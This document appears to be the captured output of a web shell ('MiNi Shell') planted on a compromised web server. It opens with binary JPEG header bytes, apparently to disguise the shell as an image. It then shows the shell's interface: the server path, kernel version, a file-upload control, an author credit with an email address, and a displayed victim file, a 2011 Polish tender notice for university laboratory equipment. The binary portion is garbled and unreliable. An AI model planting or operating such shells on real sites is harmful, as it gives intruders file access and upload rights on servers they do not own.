JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110203/39007-N-2011.html

<p class="kh_header"><b>Kalisz: Dostawa sprzętu, szkła i odczynników na potrzeby  laboratoriów kierunku  Inżynieria Środowiska i kierunku Kosmetologia Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego w Kaliszu</b><br>
<b>Numer ogłoszenia: 39007 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu , ul. Nowy Świat 4, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7573674, 7679505, faks 062 7679506.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu, szkła i odczynników na potrzeby  laboratoriów kierunku  Inżynieria Środowiska i kierunku Kosmetologia Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego w Kaliszu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  dostawa sprzętu, szkła i odczynników na potrzeby 
   laboratoriów kierunku  Inżynieria Środowiska i kierunku Kosmetologia Państwowej 
  Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego w Kaliszu. Zamówienie składa się z  4 części (zadań), z podziałem na:
Zadanie nr 1 - dostawa sprzętu  do Laboratorium Radiometrii, w tym : układ  
 spektometrii gamma, układ detekcji promieniowania gamma, układ detekcji promieniowania beta, roztwór scyntylacyjny.
 Zadanie nr 2 -  dostawa sprzętu do  laboratoriów kierunku Inżynieria Środowiska,
 w tym : Laboratorium Chemii Fizycznej , Pracowni Technologii Wody.
Zadanie nr 3 -  dostawa sprzętu  do laboratorium kierunku Kosmetologia,  w tym :           wagi, palniki, mieszadła mechaniczne, termometry cyfrowe ,płaszcze 
                   grzejne,   biurety cyfrowe, i inne
Zadanie nr 4 -  dostawa szkła i odczynników laboratoryjnych dla kierunków   
                     Inżynieria  Środowiska i Kosmetologia,  w tym między innymi: dozowniki butelkowe, butle do dozownika, pompki pipetowe pipety szklane, pipety automatyczne, butle laboratoryjne, cylindry miarowe, kolby miarowe, zlewki i odczynniki  laboratoryjne, itp.
 2. Zakres przedmiotu zamówienia obejmuje : 
 2.1.dostawę sprzętu, szkła i odczynników (dla zadania nr  1, 2, 3 i 4)  tj. zakup, transport, rozpakowanie, ustawienie i sprawdzenie działania przedmiotu zamówienia  w wyznaczonym przez Zamawiającego miejscu - obiekty przy ulicy:  Poznańskiej 201-  205 i Kaszubskiej 13  w Kaliszu.
 2.2. instalację sprzętu dla zadania nr 1 tzn:  należy zamontować, podłączyć do sieci  elektrycznej i logicznej, sprawdzić działanie sprzętu,  w miejscu użytkowania  
wraz ze szkoleniem z obsługi dla min. 2 osób.
 3. Zakres i szczegółowy opis przedmiotu zamówienia został określony  w  załączniku nr 4 do   oferty -  Formularz cenowy. Opis ten zawiera  parametry i ilości wymagane przez Zamawiającego,  co oznacza, że oferowany przez Wykonawcę sprzęt, szkło i odczynniki musi spełniać co najmniej  parametry określone w kol.2 Formularza cenowego.
 Jeżeli w opisie przedmiotu  zamówienia znajduje się wskazanie: nazwy,  znaku towarowego, patentu lub pochodzenia,  to podano to jako  przykładowe mające na  celu doprecyzowanie przedmiotu  zamówienia  i określające standard  techniczny i   jakościowy.
  4. Zamawiający dopuszcza składanie ofert równoważnych. Za ofertę równoważną zostanie uznana oferta, w której zaoferowane produkty co najmniej spełniają  wszystkie parametry  techniczne, funkcjonalne i jakościowe produktów wskazane kol. 2 Formularza cenowego.          
5. Wykonawca zobowiązany jest do podania w Formularzu cenowym dla zadania nr 2 i nr 3 danych  dotyczących oferowanych produktów w zakresie tam wyszczególnionym, a w szczególności w kol. 8: producenta oferowanego produktu z opisem i załączyć do oferty fotografię (folder) lub podać stronę i pozycję z katalogu, który należy załączyć do oferty.
6. Oferowane produkty muszą być fabrycznie nowe, objęte gwarancją producenta , przy czym dla  zadania nr 1, nr 2 i nr 3 - Zamawiający wymaga udzielenia gwarancji  na wykonany przedmiot  zamówienia na okres nie krótszy niż 12 miesięcy, licząc od terminu obioru końcowego , a dla zadania nr 4 - dostarczone produkty muszą posiadać aktualny termin  ważności - gwarancja producenta - ważny minimum trzy miesiące od dnia ich dostarczenia .
7. Dla zadania nr 4 - Zamawiający wymaga aby szkło było klasy ( jakości) nie gorszej niż Simax .  W celu potwierdzenia powyższego Wykonawca powinien dołączyć do oferty próbki szkła z jednego typu szeregu, obowiązującego w całej ofercie. Próbki powinny stanowić  : kolba miarowa 100 ml, pipeta wielomiarowa 10 ml, cylinder miarowy 100 ml  - po 1 sztuce każda.
Zamawiający zwróci Wykonawcom, których oferty nie zostały wybrane, na ich pisemny wniosek,  złożone próbki, zgodnie z  art. 97 ust. 2 ustawy.
 Dla  pozycji wskazanych ( CERTYFIKAT SERII) w  Formularzu cenowym dla zadania nr 4 oferowane produkty  muszą  posiadać certyfikat serii producenta .
Właściwe dokumenty ( zaświadczenia producenta potwierdzające spełniane posiadania certyfikatu serii) zostaną załączone do  dokumentów  odbiorowych przedmiotu umowy. Brak tych  dokumentów spowoduje nie podpisanie przez Zamawiającego protokołu odbioru.
8. Wszystkie koszty związane z dostawą , transportem, rozmieszczeniem , montażem, uruchomieniem i sprawdzeniem sprzętu  pokryje Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.11.16.00-7, 33.79.30.00-5, 38.43.71.00-8, 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowego  warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku, wykażą wykonanie  tj. zakończenie 
w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli  okres 
prowadzenia działalności jest krótszy - w  tym okresie co najmniej jedno zamówienie
 odpowiadające swoim rodzajem dostawom stanowiącym  przedmiot zamówienia tj;
dla zadania nr 1 -  o wartości  minimum 50.000,00 złotych brutto, dostawa sprzętu 
                                        laboratoryjnego, 
 dla zadania nr 2 -   o wartości  minimum  50.000,00 złotych brutto, dostawa
                                        sprzętu laboratoryjnego, 
 dla zadania nr 3 -   o wartości  minimum  30.000,00 złotych brutto, dostawa
                                        sprzętu laboratoryjnego, 
 dla zadania nr 4 -   o wartości  minimum  50.000,00 złotych brutto, dostawa
                                        odczynników lub/ i szkła.
 Zamawiający wymaga, aby  dostawy te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego   warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego  warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca, zgodnie z art. 26 ust. 2 b  może polegać  na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach  finansowych  innych  podmiotów, niezależnie  od charakteru  prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji  zobowiązany jest  udowodnić Zamawiającemu, iż  będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  zobowiązanie  tych podmiotów do  oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2.Wypełniony i podpisany  Formularz cenowy , dla zadania na które Wykonawca składa ofertę wraz z  podaniem wymaganych  informacji i wyliczeniem ceny dla  oferowanych produktów  . Powyższe stanowią  załącznik  nr 4 do oferty. 
3. W przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
       o którym  mowa w ppkt. 10.2. lit.b lub ppkt.10.10 SIWZ;
4. W przypadku Wykonawców będących osobą fizyczną, w celu umożliwienia 
     Zamawiającemu identyfikacji danych Wykonawcy, zaleca się załączenie do oferty aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartej umowy może nastąpić  za zgodą obu stron  wyrażoną  na piśmie  w formie  aneksu do umowy, pod rygorem nieważności takiej zmiany i mogą zostać dokonane,  o ile nie stoją w sprzeczności z regulacjami zawartymi w  ustawie Prawo zamówień publicznych.     
 2. Podstawą dokonania zmiany zapisów umowy, poza przypadkami określonymi w umowie, będą:
 1) zmiany przepisów prawa  powszechnie obowiązującego, jeśli zmiana ta wpływa na zakres lub  warunki wykonania przez  strony świadczeń wynikających z umowy ,
 2) zmiana terminu realizacji zamówienia, wynikająca z czynników obiektywnych lub
 których strony nie były w stanie przewidzieć pomimo zachowania należytej staranności.
  3. W celu dokonania zmian zapisów umowy wnioskowanych  przez stronę, zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich uzasadnieniem. Zmiany te muszą być korzystne lub neutralne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.kalisz.pl /BIP/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PWSZ w Kaliszu, Dział Techniczny, ulica Nowy Świat 5, I piętro, pokój 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 11:00, miejsce: PWSZ w Kaliszu (62-800), ulica Nowy Świat 5, Dział Techniczny - pokój 1, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa sprzętu  do Laboratorium Radiometrii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje :układ spektometrii gamma, układ detekcji promieniowania gamma, układ detekcji  promieniowania beta, roztwór scyntylacyjny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.16.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa sprzętu do  laboratoriów kierunku Inżynieria Środowiska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy: Laboratorium Chemii Fizycznej , Pracowni Technologii Wody..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa sprzętu  do laboratorium kierunku Kosmetologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres  zamówienia obejmuje :wagi, palniki, mieszadła mechaniczne, termometry cyfrowe ,płaszcze grzejne,   biurety cyfrowe, dygestorium , mieszadło magnetyczne
i inne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa szkła i odczynników laboratoryjnych dla kierunków Inżynieria  Środowiska i Kosmetologia,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje miedzy innymi : dozowniki butelkowe, butle do dozownika, pompki pipetowe pipety szklane, pipety automatyczne, butle laboratoryjne, cylindry miarowe, kolby miarowe, zlewki i odczynniki  laboratoryjne, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.71.00-8, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com